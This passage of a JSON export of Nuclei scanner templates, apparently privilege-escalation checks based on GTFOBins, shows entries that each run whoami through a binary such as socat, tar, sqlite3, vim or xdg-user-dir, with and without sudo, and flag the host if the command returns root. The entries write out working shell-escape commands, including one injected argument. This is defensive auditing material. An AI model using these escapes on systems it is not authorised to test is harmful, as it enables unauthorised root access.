5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c64" }, "name": "privesc-sash.yaml", "content": "id: privesc-sash\n\ninfo:\n name: sash - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n sash is a stand-alone shell that is commonly used for system recovery and maintenance. It provides a minimal set of commands and features, making it useful in situations where the regular shell environment may not be available or functional. sash is often used in emergency situations to troubleshoot and repair systems.\n reference:\n - https://gtfobins.github.io/gtfobins/sash/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,sash,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n sash -c 'whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo sash -c 'whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100ce3e0790fc0f2df9c854c0ebbea87101366fb71cb94b201e9cfe514944fd99a9022049f61f1295c5c558f823dce1676595bbc76b6231d4e119c8ac27fd97f13885f3:922c64590222798bb761d5b6d8e72950", "hash": "88a621e780b499228fd6f914b00b2f36", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c65" }, "name": "privesc-slsh.yaml", "content": "id: privesc-slsh\n\ninfo:\n name: slsh - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n slsh is a command-line shell that is designed to provide a secure environment for executing shell commands. It is often used in scenarios where security and privilege separation are important, such as in web hosting environments or when running untrusted code. slsh aims to provide a secure and restricted shell environment for executing commands.\n reference:\n - https://gtfobins.github.io/gtfobins/slsh/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,slsh,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n slsh -e 'system(\"whoami\")'\n\n - engine:\n - sh\n - bash\n source: |\n sudo slsh -e 'system(\"whoami\")'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 490a00463044022054dcff275e626011ad92fcd8316cdd208fe284c043a239db0ffda2204d9fb1fa02202ac46ad85fa7cc9cabac22423ed101b80e6b0ce83b18ccb1c750aae936085e25:922c64590222798bb761d5b6d8e72950", "hash": "d535bb0db9279f9db66ce03542001c2b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c66" }, "name": "privesc-socat.yaml", "content": "id: privesc-socat\n\ninfo:\n name: Socat - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n Socat is a command-line utility that establishes two bidirectional byte streams and transfers data between them. It can be used for a wide range of networking tasks, such as file transfer, port forwarding, and network testing. Socat is known for its versatility and is often used for creating complex network connections and proxies.\n reference:\n - https://gtfobins.github.io/gtfobins/socat/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,socat,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n socat stdin exec:whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo socat stdin exec:whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a0048304602210099cc2474353834fa6a66ad77e870bc4f92f554d9f797223c6159ff031b3dfe1f022100c127110922ef2fac1198a268a26bc62c7407f4878efdb7a06614b6bd9eb72b9d:922c64590222798bb761d5b6d8e72950", "hash": "b6b39aece2a1cf9f89e36eb9684363f6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c67" }, "name": "privesc-softlimit.yaml", "content": "id: privesc-softlimit\n\ninfo:\n name: softlimit - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n The softlimit command is used in conjunction with the daemontools software to set resource limits for a process. It is commonly used to control the resource usage of a process, such as limiting its memory or CPU usage. The softlimit command helps in managing and controlling the resource consumption of a process, which can be useful for ensuring system stability and preventing resource exhaustion.\n reference:\n - https://gtfobins.github.io/gtfobins/softlimit/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,softlimit,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n softlimit whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo softlimit whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100a04eb21179c92c0ad5a55f0bec1251c15dda9da6a4e7940675c13fdc1178a61c022100d43ab793bac3d766f256170d31c068295cb7a532d05bf5566af6b244fbc16be2:922c64590222798bb761d5b6d8e72950", "hash": "1b653e52262699e2ff81a8af256fc04d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c68" }, "name": "privesc-sqlite3.yaml", "content": "id: privesc-sqlite3\n\ninfo:\n name: sqlite3 - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n sqlite3 is a lightweight, self-contained, and serverless SQL database engine. It is widely used in embedded systems, mobile devices, and small to medium-sized applications.\n reference:\n - https://gtfobins.github.io/gtfobins/sqlite3/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,sqlite3,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n sqlite3 /dev/null '.shell whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo sqlite3 /dev/null '.shell whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022022a00ad1518880dc881748fd331a8f7a3c599927934d342c7221c5ecccd445c1022100cff484fd929a67261efcef2917d8976308c8062ca11652d78b36b40c195c08aa:922c64590222798bb761d5b6d8e72950", "hash": "82ee4707ac4ba877adfe325db01bd278", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c69" }, "name": "privesc-ssh-agent.yaml", "content": "id: privesc-ssh-agent\n\ninfo:\n name: ssh-agent - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n ssh-agent is a program that helps manage and store private keys used for SSH authentication. It is often used to hold the decrypted private keys in memory, allowing for seamless authentication to remote servers without the need to re-enter passphrases for the keys.\n reference:\n - https://gtfobins.github.io/gtfobins/ssh-agent/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,ssh-agent,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n ssh-agent whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo ssh-agent whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a0048304602210097e3d63029818e5d2e81fda0c3087d89ee4eb8304ff3916d66fd3e55bbdf169e022100ed38e13697f09436a051297c35da6f03118ab07621ba25ddd959af7f2f954fb5:922c64590222798bb761d5b6d8e72950", "hash": "72ea417c0b1cbf3fc9b09dba86d9f01e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c6a" }, "name": "privesc-sshpass.yaml", "content": "id: privesc-sshpass\n\ninfo:\n name: sshpass - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n sshpass is a command-line tool that provides a way to automatically input SSH passwords for password authentication. It is commonly used in scripts and automated processes where interactive password entry is not feasible.\n reference:\n - https://gtfobins.github.io/gtfobins/sshpass/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,sshpass,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n sshpass whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo sshpass whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100c9162852d30aaf04d1c07084230bd493a5785a7222866b7e4c249f4c384eaaf4022100db31e8c2e869ebda6aa552861701b090313dedfa33745a12bf57dacb15f1313c:922c64590222798bb761d5b6d8e72950", "hash": "6331d0dbc8dd0471c4be5ff8701346ef", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c6b" }, "name": "privesc-stdbuf.yaml", "content": "id: privesc-stdbuf\n\ninfo:\n name: stdbuf - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n The stdbuf command is used to modify the buffering operations of another command. It can be used to adjust the input/output buffering of a command, which can be useful for controlling the flow of data and improving the performance of certain operations.\n reference:\n - https://gtfobins.github.io/gtfobins/stdbuf/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,stdbuf,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n stdbuf -i0 whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo stdbuf -i0 whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022044c9d477bc49908bc0d4f73ddfe99855deac7b1000b8ebaf9f767ecc651da01602210089548a828bf5734329ae07791d0f488c2f5aa03715c28b85722fdcf48368c7e0:922c64590222798bb761d5b6d8e72950", "hash": "84092f7dae38301dfbb0d4f65e1fac83", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c6c" }, "name": "privesc-strace.yaml", "content": "id: privesc-strace\n\ninfo:\n name: strace - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n strace is a diagnostic, debugging, and instructional utility for Linux. It is used to monitor the system calls and signals that a program receives, allowing users to trace and analyze its interactions with the kernel.\n reference:\n - https://gtfobins.github.io/gtfobins/strace/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,strace,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n strace -o /dev/null whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo strace -o /dev/null whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a0047304502202b121064fdd29dfb40970b3956fcfb830cc7150f895b56913870f21c1f2f5e85022100fd214757ef5ac44a07cfc6fcdcf6da1fe59cd2b44f98829f01fc6af0c58045d8:922c64590222798bb761d5b6d8e72950", "hash": "07d7ba4ef36e68c328aa9f1ed4c075bb", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c6d" }, "name": "privesc-tar.yaml", "content": "id: privesc-tar\n\ninfo:\n name: tar - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n tar is a command-line utility used to create and manipulate archive files. It is commonly used for bundling multiple files and directories into a single archive, often used in conjunction with compression tools like gzip or bzip2.\n reference:\n - https://gtfobins.github.io/gtfobins/tar/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,tar,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100c505ccd3523d1185243180df012aa21eec0eb8062fe80bb508fe4ad53833ac4f022100c0478b121270a491ceea51d50c657ddc06b409067f7883554891c6698d51ab80:922c64590222798bb761d5b6d8e72950", "hash": "d0de2f07b54fd2ce449c1d881814da53", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c6e" }, "name": "privesc-tcsh.yaml", "content": "id: privesc-tcsh\n\ninfo:\n name: tcsh - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n tcsh is a Unix shell based on and compatible with the C shell (csh). It provides a command-line interface for interacting with the operating system and executing commands.\n reference:\n - https://gtfobins.github.io/gtfobins/tcsh/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,tcsh,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n tcsh -c 'whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo tcsh -c 'whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a004730450220149b0d0f5adce844377578aeda6fc48ac9871ef3341742a50dc21c1bacdfe614022100a2f0ad3b6b4557214228acc448e28537c82fbdc00a7aaf0636714cf7f42e625b:922c64590222798bb761d5b6d8e72950", "hash": "39b67ab52cb02adbbb0b8713b1d776c7", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c6f" }, "name": "privesc-time.yaml", "content": "id: privesc-time\n\ninfo:\n name: Time - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n The time command is used to determine the amount of time taken by a command to execute.\n reference:\n - https://gtfobins.github.io/gtfobins/time/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,time,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n time whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo time whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 490a00463044022068aa7f9e01e7760a55ef866b4ba649e4281e569227d78fd3f56f1dbc5c28a06202204fb175df55a694a787172f84639d84d18b5c102dd12d852b54ee0161e82251cb:922c64590222798bb761d5b6d8e72950", "hash": "f106a5922a9d5d941edeee91e93e522f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c70" }, "name": "privesc-timeout.yaml", "content": "id: privesc-timeout\n\ninfo:\n name: Timeout - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n The timeout command is used to run a command with a specified time limit. It is commonly used to prevent a command from running indefinitely and to enforce a time restriction on its execution.\n reference:\n - https://gtfobins.github.io/gtfobins/timeout/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,timeout,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n timeout 7d whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo timeout 7d whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022073e3ddb397099a5799b62affb115a9a23c353e96dea27b28e287229dc67e55a6022100a733860bfc6be7f5d2beef066d12158ad7117d237f9e1b2b3ca1a01cfeeab373:922c64590222798bb761d5b6d8e72950", "hash": "edc9e1323321c382a8d1f3f94316b191", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c71" }, "name": "privesc-tmate.yaml", "content": "id: privesc-tmate\n\ninfo:\n name: tmate - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n tmate is a terminal multiplexer that allows multiple users to access and collaborate in the same terminal session.\n reference:\n - https://gtfobins.github.io/gtfobins/tmate/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,tmate,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n tmate -c whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo tmate -c whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100d7a22928033a826de562099c09867981c934c100f40a8f85b344621a09ad4183022100d31e45450871e72b3b83df9eae07facb93fa0ba422524875f57c02ba7c02fd22:922c64590222798bb761d5b6d8e72950", "hash": "392858209a5c7cb04ffbf9923002ccb8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c72" }, "name": "privesc-torify.yaml", "content": "id: privesc-torify\n\ninfo:\n name: Torify - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n torify is a command-line utility that is used to transparently route network traffic through the Tor network. It is commonly used to anonymize the network connections of other command-line programs, allowing them to communicate over the Tor network for enhanced privacy and security.\n reference:\n - https://gtfobins.github.io/gtfobins/torify/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,torify,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n torify whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo torify whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a004830460221008ca7aa24f7f8fa13b8d43c96981d8fd78a382752f6e2c69dfab164443972b747022100d307d8b9c2054d4731db696fc13198afed46d5b1215a6899b56533661240fc91:922c64590222798bb761d5b6d8e72950", "hash": "5e1595c2b80414400a1124c536fb0855", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c73" }, "name": "privesc-torsocks.yaml", "content": "id: privesc-torsocks\n\ninfo:\n name: Torsocks - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n torsocks is a wrapper that enables the use of the Tor network for any program, including those that do not natively support proxy settings. It intercepts and redirects network calls from the target program through the Tor network, providing a way to anonymize the network traffic of various applications.\n reference:\n - https://gtfobins.github.io/gtfobins/torsocks/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,torsocks,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n torsocks whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo torsocks whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a004730450221009508b116a8d191c5652f0f02943050fa0c1ef20aa0c49c6e7b6ad79000fb62ea02205d89591a5d546bea451db17a3b0401ef437c788396431e8e28526f90e54ed07c:922c64590222798bb761d5b6d8e72950", "hash": "cdf645a75ce02a072a532e374b6517cc", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c74" }, "name": "privesc-unshare.yaml", "content": "id: privesc-unshare\n\ninfo:\n name: Unshare - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n The unshare command is used to run a command in a new namespace, which can isolate various aspects of the system, such as the mount namespace, network namespace, user namespace, and more.\n reference:\n - https://gtfobins.github.io/gtfobins/unshare/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,unshare,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n unshare whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo unshare whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a004830460221008089aba3a614ad70901d62d2611e3a01a42cb1d918eac6315a938c392890768f022100867c33eb6a50e6df63d5adfb3438ef308341581f474ebabe50624c470a77ad90:922c64590222798bb761d5b6d8e72950", "hash": "5faf635eda059a506a38b9ee93208932", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c75" }, "name": "privesc-vi.yaml", "content": "id: privesc-vi\n\ninfo:\n name: Vi - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n vi is a classic text editor in Unix and Unix-like operating systems. It is known for its modal editing capabilities and is often used for editing configuration files, scripts, and other text-based content in a terminal environment.\n reference:\n - https://gtfobins.github.io/gtfobins/vi/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,vi,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n vi -c '!whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo vi -c '!whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 490a0046304402203b4c6367774f4a6a195f7a1d884128f82a9a56209babeda7f9e3dd7d86b17a840220610ff4b54867dd54875c5830709819f89b5ac947821bf90200b49c561e1fd260:922c64590222798bb761d5b6d8e72950", "hash": "907b7139ff03804a0c66ff9435fbe099", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c76" }, "name": "privesc-view.yaml", "content": "id: privesc-view\n\ninfo:\n name: View - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n view is a command that is often associated with the vi text editor. When invoked as \"view,\" vi starts in read-only mode, allowing users to view files without the ability to modify them.\n reference:\n - https://gtfobins.github.io/gtfobins/view/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,view,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n view -c ':!whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo view -c ':!whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100ed64ed48009962a92006b2ce803d0c5189e91ced727a841bc8c31e5d98d1a9b5022009f19b7df531fecde9b1303555d1ec29ba63a49ca1c439b6f48f46552d2d4bb4:922c64590222798bb761d5b6d8e72950", "hash": "6b5b64da3e9943654941d95aeba1df4f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c77" }, "name": "privesc-vim.yaml", "content": "id: privesc-vim\n\ninfo:\n name: Vim - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n Vim is a highly configurable, modal text editor based on the vi editor.\n reference:\n - https://gtfobins.github.io/gtfobins/vim/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,vim,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n vim -c '!whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo vim -c '!whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 490a00463044022049612d7d75c63ad4e467855595db3faaab56fa1534c82d09e285bf6ba7c4bbe602202e97df70026e66c37b68bf8fafe1742c4ad9d3dba438c61afb90148c61182761:922c64590222798bb761d5b6d8e72950", "hash": "7c002b674ab5ebe4386ab03b31c8c1c8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c78" }, "name": "privesc-xargs.yaml", "content": "id: privesc-xargs\n\ninfo:\n name: Xargs - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n xargs is a command in Unix and Unix-like operating systems used to build and execute command lines from standard input.\n reference:\n - https://gtfobins.github.io/gtfobins/xargs/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,xargs,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n xargs -a /dev/null whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo xargs -a /dev/null whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022052f887093022e061b40da1eae5a8b4aa8a5f267dfd5f22db005a9076db73cc9a02210093f126e5d0229cf686f3c547dc3466e89afb2a7bf57bbeb790acf65376fcd047:922c64590222798bb761d5b6d8e72950", "hash": "1ed5ecedadaf7d67c8b9754dc3419a19", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c79" }, "name": "privesc-xdg-user-dir.yaml", "content": "id: privesc-xdg-user-dir\n\ninfo:\n name: xdg-user-dir - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n The xdg-user-dir command is used to retrieve the path of a user's special directories, such as the user's home directory, desktop directory, download directory, and others, based on the XDG Base Directory Specification.\n reference:\n - https://gtfobins.github.io/gtfobins/xdg-user-dir/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,xdg-user-dir,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n xdg-user-dir '}; whoami #'\n\n - engine:\n - sh\n - bash\n source: |\n sudo xdg-user-dir '}; whoami #'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 490a00463044022052d790338c95d5a4f0c68b4a60843f3df6aac090487f194ecc148d85f94d76c802200a3645f26c4ddb25cd492038654121f410a284c9cbbd2f904ff4d9b104759046:922c64590222798bb761d5b6d8e72950", "hash": "c20d2a65d04c7e809166fb59c0fbdd5b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c7a" }, "name": "privesc-yash.yaml", "content": "id: privesc-yash\n\ninfo:\n name: Yash - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n yash is a POSIX-compliant command shell that aims to be a lightweight and efficient alternative to other shells such as Bash or Zsh.\n reference:\n - https://gtfobins.github.io/gtfobins/yash/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,yash,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n yash -c 'whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo yash -c 'whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 490a004630440220407cbe43d57f1fdae8cb42d677464a71d661e4ad5e5f625a3c8046b40e9a7c2e0220090af158add8ff1477e2996116208ad71e0c659f5975505ecc9c7a4fee7d91fe:922c64590222798bb761d5b6d8e72950", "hash": "990013e6e7c960928e884ea4a70947b1", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c7b" }, "name": "privesc-zsh.yaml", "content": "id: privesc-zsh\n\ninfo:\n name: Zsh - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n zsh is a powerful and feature-rich shell for Unix-like operating systems. It offers advanced interactive features, extensive customization options, and robust scripting capabilities\n reference:\n - https://gtfobins.github.io/gtfobins/zsh/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,zsh,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n zsh -c 'whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo zsh -c 